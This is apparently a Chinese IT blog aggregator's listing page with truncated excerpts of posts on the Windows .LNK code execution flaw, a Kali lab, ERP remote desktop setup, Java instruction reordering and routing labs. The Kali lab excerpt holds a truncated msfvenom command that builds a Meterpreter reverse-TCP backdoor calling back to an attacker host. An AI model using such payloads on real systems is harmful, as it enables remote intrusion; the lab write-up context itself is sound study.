0x01 漏洞原理 Windows系统通过解析 .LNK 后缀文件时,是使用二进制来解析的,而当恶意的二进制代码被系统识别执行的时候就可以实现远程代码执行,由于是在explorer.exe进程中运行的,所以load进内存的时候与当前用户具有相同的权限。 于是攻击者利用这一解析过程的漏洞,将包含恶意二 ...
分类:
系统相关 时间:
2019-09-01 18:31:17
阅读次数:
297
实验环境: kali 主机:192.168.88.193 目标靶机:win2008 R2 192.168.88.130 kali 主机上执行生成一个后门 exe: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.88.193 LPO ...
分类:
其他好文 时间:
2019-09-01 01:45:56
阅读次数:
183
需求:通过瑞友天翼发布ERP程序,桌面用户通过WEB方式访问ERP。 方案: 1.OS: 安装虚拟服务器VirtualSvr: 系统Windows Server 2008 R2 Standard English ,64bit系统 2.OS: VirtualSvr,加入到域环境,使用具有本地管理员权限 ...
分类:
其他好文 时间:
2019-08-31 19:49:37
阅读次数:
153
java代码是否一定按顺序执行? 这个问题听起来有点蠢,串行的代码确实会按代码语意正确的执行,但是编译器对于代码本身的优化却并不一定会按实际的代码一步一步的执行。 比如: r1=a; r2=r1.x; r3=r1.x; 编译器则可能会进行优化,将r3=r1.x这条指令替换成r3=r2,这就是指令的重 ...
分类:
其他好文 时间:
2019-08-30 23:08:42
阅读次数:
113
原文介绍了两种方式,方式一经测试可用(生成exe在开发机器上可运行),但是因为服务器是windows server2012 r2,没有安装补丁,造成了困难,尚未在服务器上运行成功。 (提示 api-ms-win-crt-runtimel1-1-0.dll,需要安装多个补丁,暂时放弃) 原文地址:ht ...
分类:
Web程序 时间:
2019-08-29 17:58:06
阅读次数:
275
实验拓扑 实验需求 现有三个自治系统,需要对R1访问R4的loopback X数据走向进行精确控制: R1访问R4的loopback0走R2,通过在R1上修改本地优先级实现 R1访问R4的loopback1走R3,通过在R2上修改MED实现 R1访问R4的loopback2走R2,通过在R4上修改A ...
分类:
其他好文 时间:
2019-08-29 13:44:57
阅读次数:
92
这是一道《华为hcip学习指南》里的题,感觉不错。就分享一下:1、简单的组网图:2、需求:在R2的RIPv2里的不同RIP进程,通告自己互联网段和loopback0网段的路由。(RIP进程1通告192.168.12.0/24网段的路由,RIP进程2里通告192.168.23.0/24网段的路由)。R1能否通过RIP学习到R3的互联网段和loopback0网段的路由?反则,R3能否通过RIP学习到R
分类:
系统相关 时间:
2019-08-21 18:57:40
阅读次数:
174
域用户的配置文件分为两种第一种:漫游用户配置文件,第二种强制用户配置文件。我们今天说的是漫游用户配置文件。漫游用户配置简单来说就是在一台计算机上的用户加入域后,在同一网络上任何其他的计算机可以登录和访问自己的文档第一步:在域服务器创建共享文件夹。(在这里我创建的是share$这个文件夹)第二步共享文件夹并设置用户的读写权限(Everyone完全控制)第三步设置域用户的配置文件位置(\\CE\为当前
运行环境:Windows Server 2012 R2 获取服务器DNS命令,下面的仅获取一个dns (nslookup sql.ciras.com)[1].split(':')[1].trim() 此脚本用来验证DNS是否正常,实际原理就是ping域名的ip 先ping域名 再解析域名的ip地址 ...
分类:
系统相关 时间:
2019-08-18 22:25:03
阅读次数:
191
某公司网络如实验拓扑所示,R4、R5、R6、R7为公司总部路由器,R1与R3分别为公司两个不同分支机构路由器,R2为运营商的网络设备,在R1与R3上分别设有不同的业务网段,其中192.168.10.0/24与172.16.10.0/24为业务A所用网段,192.168.20.0/24与172.16. ...
分类:
其他好文 时间:
2019-08-17 12:41:18
阅读次数:
135